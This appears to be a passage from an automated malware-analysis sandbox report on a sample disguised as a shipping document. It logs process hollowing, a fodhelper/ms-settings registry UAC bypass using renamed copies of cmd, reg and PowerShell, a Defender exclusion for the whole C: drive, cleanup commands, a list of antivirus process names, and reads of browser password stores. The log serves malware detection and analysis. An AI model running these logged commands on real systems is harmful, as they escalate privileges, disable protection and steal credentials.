Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 34_2_00007FF70CC88FA4
Source: C:\Users\Public\xkn.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Memory allocated: C:\Users\Public\Libraries\glrkszlG.pif base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Memory allocated: C:\Users\Public\Libraries\glrkszlG.pif base: 1E0C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279580EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 0_2_279580EF
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: NULL target: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe protection: execute and read and write
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section unmapped: C:\Users\Public\Libraries\glrkszlG.pif base address: 400000
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Memory written: C:\Users\Public\Libraries\glrkszlG.pif base: 31C008
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27959627 mouse_event, 0_2_27959627
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process created: C:\Users\Public\Libraries\glrkszlG.pif C:\Users\Public\Libraries\glrkszlG.pif
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\agyqwjporhwhb"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\cidbxbaqfqomdosx"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\mcrtxutjtygzocojvhg"
Source: C:\Users\Public\Libraries\glrkszlG.pif Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114355115.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114355115.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerD
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114261352.0000000027502000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_40102933 cpuid 0_2_40102933
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: EnumSystemLocalesW, 0_2_27991F9B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: EnumSystemLocalesW, 0_2_27991F50
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_27992610
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: GetLocaleInfoW, 0_2_27992543
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_27991CD8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: EnumSystemLocalesW, 0_2_27988404
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_2799243C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: GetLocaleInfoW, 0_2_27992313
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: GetLocaleInfoW, 0_2_279888ED
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: EnumSystemLocalesW, 0_2_27992036
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: GetLocaleInfoA, 0_2_2794F8D1
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 5_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 5_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 5_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 6_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 6_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 6_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 9_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 9_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 9_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 31_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 31_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 31_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 32_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 32_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 32_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 34_2_00007FF70CC851EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 34_2_00007FF70CC83140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 34_2_00007FF70CC76EE4
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_40102264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_40102264
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795B60D GetComputerNameExW,GetUserNameW, 0_2_2795B60D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_279893AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_279893AD
Source: C:\Users\Public\Libraries\glrkszlG.pif Code function: 1_2_0040559A GetVersionExW,GetVersionExW, 1_2_0040559A
Source: C:\Users\Public\xkn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR
Source: C:\Users\Public\alpha.exe File opened: \\Windows \
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
